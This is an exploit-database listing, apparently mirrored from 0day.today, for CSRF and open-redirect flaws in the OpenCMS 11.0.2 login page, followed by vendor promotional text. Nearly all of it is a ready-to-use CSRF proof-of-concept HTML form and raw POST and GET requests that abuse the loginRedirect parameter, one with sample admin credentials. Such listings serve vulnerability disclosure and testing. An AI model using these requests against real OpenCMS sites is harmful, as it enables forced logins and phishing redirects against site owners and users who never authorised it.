Lucene search
K

OpenCMS 11.0.2 Cross Site Request Forgery / Open Redirection Vulnerability

🗓️ 09 Mar 2021 00:00:00Reported by zdtType 
zdt
 zdt
🔗 0day.today👁 22 Views

OpenCMS 11.0.2 CSRF and Open Redirect Vulnerabilit

Code
OpenCMS v11.0.2
--------------------------------------------------------------------------------------------------------------------------------------------------
CSRF - Login page vulnerable (https://vulnerablehost.com/system/login - CSRF needs valid JSESSIONID to work, maybe logged Admin user)


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://vulnerablehost.com/system/login" method="POST">
      <input type="hidden" name="ocUname" value="anything" />
      <input type="hidden" name="ocPword" value="anything" />
      <input type="hidden" name="loginRedirect" value="https://google.com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

--------------------------------------------------------------------------------------------------------------------------------------------------

Open Redirect (POST method - Open Redirect needs valid JSESSIONID to work, maybe logged Admin user)

POST /system/login HTTP/1.1
Host: vulnerablehost.com
Connection: close
Content-Length: 63
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://vulnerablehost.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://vulnerablehost.com/system/login
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID_opencms=valid JSESSIONID authenticated cookie

ocUname=Admin&ocPword=admin123&loginRedirect=https://google.com

--------------------------------------------------------------------------------------------------------------------------------------------------

Open Redirect GET method - Open Redirect needs valid JSESSIONID to work, maybe logged Admin user)

GET /system/login?loginRedirect=https://google.com HTTP/1.1
Host: vulnerablehost.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: https://vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://vulnerablehost.com/system/login
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=Valid JSESSIONID authenticated cookie

#  0day.today [2021-09-17]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation